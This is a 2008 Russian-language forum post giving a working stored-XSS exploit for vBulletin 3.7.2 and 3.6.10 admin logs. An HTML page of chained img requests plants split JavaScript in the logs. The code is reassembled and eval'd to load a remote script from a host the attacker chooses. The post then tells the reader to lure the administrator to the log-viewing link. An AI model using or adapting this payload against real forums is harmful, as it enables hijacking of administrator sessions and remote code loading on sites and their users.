Показать сообщение отдельно

Xss (3.7.2, 3.6.10)
  #39  
Старый 12.07.2008, 13:17
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию Xss (3.7.2, 3.6.10)

XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

http://securityvulns.ru/Udocument137.html

язвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы.

Exploit:

1) Оставляем в логах булки нашу хсс, используя данный эксплоит:
Код HTML:
<html> 
<body> 
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.
php/1?do=*/a%3D'document.wri'/*" 
/> 
<img src="http://localhost/vB/upload/admincp/faq.
php/2?do=*/b%3D'te(%22<script 
'/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.
php/3?do=*/c%3D'src=http://'/*" 
/> 
<!--edit to match your data --> 
<img src="http://localhost/vB/upload/admincp/faq.
php/4?do=*/d%3D'localhost/'/*" 
/> 
<img src="http://localhost/vB/upload/admincp/faq.
php/5?do=*/e%3D''/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.
js></scrip'/*" 
/> 
<!-- end edit --> 
<img src="http://localhost/vB/upload/admincp/faq.
php/7?do=*/g%3D't>%22)'/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.
php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" 
/> 
<img src="http://localhost/vB/upload/admincp/faq.
php/9?do=*/eval(h)/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.
php/a0?do=*/</script>" /> 
</body> 
</html>
2) Затем отправьте админа по ссылке:
/adminlog.php?do=view&script=&u=0&pp=15&orderby=scr ipt&page=1


Ограничения:
PHP_SELF - 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters

Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

 
Ответить с цитированием